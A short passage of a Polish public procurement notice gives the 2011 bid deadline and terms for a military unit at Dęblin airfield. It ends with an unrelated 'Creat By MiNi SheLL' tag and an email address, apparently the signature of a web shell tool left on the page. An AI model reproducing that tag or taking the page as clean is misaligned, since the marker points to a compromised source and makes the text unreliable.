<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 12:00, miejsce: Kancelaria Jawna pok. nr 20 Jednostki Wojskowej 4219, Lotnisko, bud. 205, 08 521 Dęblin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com